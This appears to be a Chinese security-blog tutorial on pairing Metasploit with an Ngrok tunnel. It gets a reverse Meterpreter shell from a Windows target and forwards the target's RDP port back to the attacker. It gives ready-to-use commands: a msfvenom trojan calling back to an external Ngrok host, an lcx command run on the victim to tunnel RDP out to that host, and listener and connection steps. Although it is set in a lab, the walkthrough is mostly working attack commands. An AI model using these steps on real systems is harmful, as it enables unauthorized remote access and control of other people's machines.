freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Metaspolit下配合Ngrok同时实现内网反弹+转发
2020-05-03 08:00:12
所属地 山东省

相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。但是我既想通过Ngrok在metaspolit下反弹shell,同时又想把对方的3389端口转发到本地,在meterperter下鱼和熊掌我都要!

Kali地址:192.168.61.130(攻击机地址)

靶机win2008: 192.168.61.134(模拟外网私人地址)

中间跳板ngrok :vipgz4.idcfengye.com

工具:lcx windows版与linux版

一、反弹shell到本地

1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)

2.在kali下构造生成反弹木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=vipgz4.idcfengye.com LPORT=10040 -f exe -a x86 --platform win -o gong32.exe

Lhost:为Ngrok服务地址    
Lport:为Ngrok分配的隧道端口

3.在Kali中运行Ngrok的客户端:

./sunny clientid Ngrok的ID号

4.Kali攻击机配置监听:

此处的lhost与lport与Ngrok中的配置相同,并开始监听。

5.将生成的木马放到靶机运行:

成功得到通过中转反弹过来的shell。

PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。

二、转发3389端口到本地

1.在Kali中执行lcx监听和转发命令:

./portmap -m 2 -p1 8848 -p2 33891 

P1为本地监听的端口(与ngrok转发的端口一致) 

P2为本地转发的端口(随便命名,但不能是已被占用的端口)

2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:

lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389 

slave后跟Ngrok服务器地址与隧道端口+本地需要转发的端口

看到ngrok客户端多出回弹的消息

3.开始在Kali中连接远程桌面连接:

rdesktop 127.0.0.1:33891

至此我们已经成功连接上了3389远程桌面。由于全程都在一台本地kali环境中操作,且只用了一条Ngrok隧道大大减少了成本。

*本文作者:waowao,转载请注明来自FreeBuf.COM

# ngrok # Metaspolit # 内网反弹
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者